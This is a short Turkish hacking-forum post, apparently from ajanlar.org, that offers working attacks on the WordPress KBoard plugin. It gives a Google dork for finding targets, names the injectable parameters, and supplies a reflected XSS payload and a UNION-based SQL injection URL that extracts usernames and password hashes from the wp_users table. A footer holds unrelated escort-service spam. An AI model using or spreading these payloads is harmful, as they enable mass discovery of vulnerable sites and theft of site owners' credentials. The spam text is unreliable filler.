WordPress plugins SQL-XSS Vulnerabilities

Ens4R

Prof Spys-z
Katılım
9 Eki 2012
Mesajlar
1,642
Tepkime puanı
3
Puanları
0
Web sitesi
ajanlar.org
google dork

inurl:wp-content/plugins/kboard/board.php

açığın parametreleri: pageid, search, keyword
örnek:/wp-content/plugins/kboard/board.php?board_id=1&pageid=1&mod=list&search=&keyword=burdan sonra xss veya sql

xss
/wp-content/plugins/kboard/board.php?board_id=1&pageid=1&mod=list&search=&keyword=%22%27%3E%3CScRiPT%3Ealert%28/XSS/%29%3C/ScRiPT%3E

sql
/wp-content/plugins/kboard/board.php?board_id=2&mod=document&uid=999%20union%20select%20group_concat%28user_login,0x3a,user_pass%29,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18%20from%20wp_users

umarım anlamısınızdır
 

mersin escort mersin e ticaret bodrum escort fethiye escort alanya escort konya escort konya escort bodrum escort vozol sakarya escort sakarya escort sakarya escort sakarya escort sakarya escort sakarya escort sakarya escort
Üst
Copyright® Ajanlar.org 2012